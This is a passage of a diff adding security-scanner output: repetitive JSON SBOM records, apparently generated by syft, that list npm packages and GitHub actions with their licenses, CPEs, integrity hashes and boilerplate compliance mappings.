"resolved": "https://registry.npmjs.org/@types/node/-/node-22.19.17.tgz", + "integrity": "sha512-wGdMcf+vPYM6jikpS/qhg6WiqSV/OhG+jeeHT/KlVqxYfD40iYJf9/AE1uQxVWFvU7MipKRkRv8NSHiCGgPr8Q==", + "dependencies": { + "undici-types": "~6.21.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "08409c71d4ce88d9", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @types/request 2.48.13", + "title": "@types/request 2.48.13", + "description": "Package discovered: @types/request 2.48.13", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "656ffeda0aaf4e8b", + "name": "@types/request", + "version": "2.48.13", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@types\\/request:\\@types\\/request:2.48.13:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40types/request@2.48.13", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@types/request/-/request-2.48.13.tgz", + "integrity": "sha512-FGJ6udDNUCjd19pp0Q3iTiDkwhYup7J8hpMW9c4k53NrccQFFWKRho6hvtPPEhnXWKvukfwAlB6DbDz4yhH5Gg==", + "dependencies": { + "@types/caseless": "*", + "@types/node": "*", + "@types/tough-cookie": "*", + "form-data": "^2.5.5" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "dd961f2e03e7418d", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @types/tough-cookie 4.0.5", + "title": "@types/tough-cookie 4.0.5", + "description": "Package discovered: @types/tough-cookie 4.0.5", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "cf24fb05ea581070", + "name": "@types/tough-cookie", + "version": "4.0.5", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@types\\/tough-cookie:\\@types\\/tough-cookie:4.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@types\\/tough-cookie:\\@types\\/tough_cookie:4.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@types\\/tough_cookie:\\@types\\/tough-cookie:4.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@types\\/tough_cookie:\\@types\\/tough_cookie:4.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@types\\/tough:\\@types\\/tough-cookie:4.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@types\\/tough:\\@types\\/tough_cookie:4.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40types/tough-cookie@4.0.5", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@types/tough-cookie/-/tough-cookie-4.0.5.tgz", + "integrity": "sha512-/Ad8+nIOV7Rl++6f1BdKxFSMgmoqEoYbHRpPcx3JEfv8VRsQe9Z4mCXeJBzxs7mbHY/XOZZuXlRNfhpVPbs6ZA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "7a188cdbd82f20f1", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @types/ws 8.18.1", + "title": "@types/ws 8.18.1", + "description": "Package discovered: @types/ws 8.18.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "919683ef9260890b", + "name": "@types/ws", + "version": "8.18.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@types\\/ws:\\@types\\/ws:8.18.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40types/ws@8.18.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@types/ws/-/ws-8.18.1.tgz", + "integrity": "sha512-ThVF6DCVhA8kUGy+aazFQ4kXQ7E1Ty7A3ypFOe0IcJV8O/M511G99AW24irKrW56Wt44yG9+ij8FaqoBGkuBXg==", + "dependencies": { + "@types/node": "*" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "89056081bb223fd4", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: abbrev 2.0.0", + "title": "abbrev 2.0.0", + "description": "Package discovered: abbrev 2.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "0277554910df9b38", + "name": "abbrev", + "version": "2.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "ISC", + "spdxExpression": "ISC", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:abbrev:abbrev:2.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/abbrev@2.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/abbrev/-/abbrev-2.0.0.tgz", + "integrity": "sha512-6/mh1E2u2YgEsCHdY0Yx5oW+61gZU+1vXaoiHHrpKeuRNNgFvS+/jrwHiQhB5apAf5oB7UB7E19ol2R2LKH8hQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "873a6392b6c08a39", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: abort-controller 3.0.0", + "title": "abort-controller 3.0.0", + "description": "Package discovered: abort-controller 3.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "02974b3dbbe4d3d6", + "name": "abort-controller", + "version": "3.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:abort-controller:abort-controller:3.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:abort-controller:abort_controller:3.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:abort_controller:abort-controller:3.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:abort_controller:abort_controller:3.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:abort:abort-controller:3.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:abort:abort_controller:3.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/abort-controller@3.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/abort-controller/-/abort-controller-3.0.0.tgz", + "integrity": "sha512-h8lQ8tacZYnR3vNQTgibj+tODHI5/+l06Au2Pcriv/Gmet0eaj4TwWH41sO9wnHDiQsEj19q0drzdWdeAHtweg==", + "dependencies": { + "event-target-shim": "^5.0.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "661684530a17a73f", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: abs-svg-path 0.1.1", + "title": "abs-svg-path 0.1.1", + "description": "Package discovered: abs-svg-path 0.1.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "2eb8f1fab63663a1", + "name": "abs-svg-path", + "version": "0.1.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:abs-svg-path:abs-svg-path:0.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:abs-svg-path:abs_svg_path:0.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:abs_svg_path:abs-svg-path:0.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:abs_svg_path:abs_svg_path:0.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:abs-svg:abs-svg-path:0.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:abs-svg:abs_svg_path:0.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:abs_svg:abs-svg-path:0.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:abs_svg:abs_svg_path:0.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:abs:abs-svg-path:0.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:abs:abs_svg_path:0.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/abs-svg-path@0.1.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/abs-svg-path/-/abs-svg-path-0.1.1.tgz", + "integrity": "sha512-d8XPSGjfyzlXC3Xx891DJRyZfqk5JU0BJrDQcsWomFIV1/BIzPW5HDH5iDdWpqWaav0YVIEzT1RHTwWr0FFshA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "27802507a1dbe242", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: accepts 1.3.8", + "title": "accepts 1.3.8", + "description": "Package discovered: accepts 1.3.8", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "e96668e505272792", + "name": "accepts", + "version": "1.3.8", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:accepts:accepts:1.3.8:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/accepts@1.3.8", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/accepts/-/accepts-1.3.8.tgz", + "integrity": "sha512-PYAthTa2m2VKxuvSD3DPC/Gy+U+sOA1LAuT8mkmRuvw+NACSaeXEQ+NHcVF7rONl6qcaxV3Uuemwawk+7+SJLw==", + "dependencies": { + "mime-types": "~2.1.34", + "negotiator": "0.6.3" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "352cd9201a8ce90d", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/node_modules/@ungap/structured-clone/.github/workflows/node.js.yml", + "startLine": 0 + }, + "message": "Package discovered: actions/checkout v2", + "title": "actions/checkout v2", + "description": "Package discovered: actions/checkout v2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "b54bfb1da26ce9cd", + "name": "actions/checkout", + "version": "v2", + "type": "github-action", + "foundBy": "github-actions-usage-cataloger", + "locations": [ + { + "path": "/node_modules/@ungap/structured-clone/.github/workflows/node.js.yml", + "accessPath": "/node_modules/@ungap/structured-clone/.github/workflows/node.js.yml", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [], + "language": "", + "cpes": [ + { + "cpe": "cpe:2.3:a:actions\\/checkout:actions\\/checkout:v2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:github/actions/checkout@v2", + "metadataType": "github-actions-use-statement", + "metadata": { + "value": "actions/checkout@v2" + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "3e33aad3d5646f4e", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/node_modules/busboy/.github/workflows/ci.yml", + "startLine": 0 + }, + "message": "Package discovered: actions/checkout v2", + "title": "actions/checkout v2", + "description": "Package discovered: actions/checkout v2", + "remediation": "Track and scan dependencies.", + "references": [], + 